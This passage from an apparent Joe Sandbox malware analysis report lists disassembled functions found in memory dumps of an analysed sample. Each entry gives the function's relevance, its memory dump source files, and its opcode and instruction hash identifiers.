                                                                              • Instruction Fuzzy Hash: 9631A0716082009BD7169F19C8C0A3BB7E1EF88358F1A8B2CF8998B345D735DC52CB82
                                                                              Function 00579063 Relevance: .1, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5a4a970c55273cdab4e5688a81588da14f9ce3d06b24cb059f074ba47c0f5e93
                                                                              • Instruction ID: c9a81d2da4ea34f0bf863681869734987127c82063dd412816c68e763cf5099a
                                                                              • Opcode Fuzzy Hash: 5a4a970c55273cdab4e5688a81588da14f9ce3d06b24cb059f074ba47c0f5e93
                                                                              • Instruction Fuzzy Hash: AE214CB250C704AFE309BE69DC8167AF7E5EB98310F12492DE7C5C3740EA3568108A9B
                                                                              Function 0033A874 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6f4206ae38269c7d7fb9041263ccb87ae8a38586c5bcf60d852a7d50b32308f8
                                                                              • Instruction ID: f780e152566aea28c48e248280f017b165f63846ce175421a5df474fd4ba59e9
                                                                              • Opcode Fuzzy Hash: 6f4206ae38269c7d7fb9041263ccb87ae8a38586c5bcf60d852a7d50b32308f8
                                                                              • Instruction Fuzzy Hash: 623185B15483849FD308DF2AD85226ABBA1FBD2344F146D1DE0D69B324DB74C14ACF8A
                                                                              Function 00332CC0 Relevance: .1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c5275e707a70d4b379646e1331e9a1b40a74931cb30aecaaeb753b9cfb47a64
                                                                              • Instruction ID: b15111eaf9afe848418b3e7f1c5a4e133811159375f1632d5e988307d88a231c
                                                                              • Opcode Fuzzy Hash: 3c5275e707a70d4b379646e1331e9a1b40a74931cb30aecaaeb753b9cfb47a64
                                                                              • Instruction Fuzzy Hash: F9112337B243224BE372CE3AECD461B6396EBC9310F0A0134EE86C7212CA62E841D181
                                                                              Function 00616DB5 Relevance: .1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 848bdc8a8f8b12d1c33c4a81e0a1835726c412eac2766ea289134fd1e86de163
                                                                              • Instruction ID: ef7ca1ae4ce72d935e25d86d3fb15f8f771ff60a52c463f1be48ac56ac1bf2ae
                                                                              • Opcode Fuzzy Hash: 848bdc8a8f8b12d1c33c4a81e0a1835726c412eac2766ea289134fd1e86de163
                                                                              • Instruction Fuzzy Hash: 5D2104B210C300EFE315BF2ADCC56AAFBE5FF98310F16892DE6D882610E73554408A97
                                                                              Function 0036BF10 Relevance: .1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5c572c9098791aef928fb969f84563f6f3ed7676c5bb59477172b505a815a29b
                                                                              • Instruction ID: 548f1210125d4513be83a232440c22cee8b25df58f48107865550ba908cdbe94
                                                                              • Opcode Fuzzy Hash: 5c572c9098791aef928fb969f84563f6f3ed7676c5bb59477172b505a815a29b
                                                                              • Instruction Fuzzy Hash: B3114C717252008BE3229A25DD8062AF767EBC5705F2ED069D8849F22DD7718C414BD1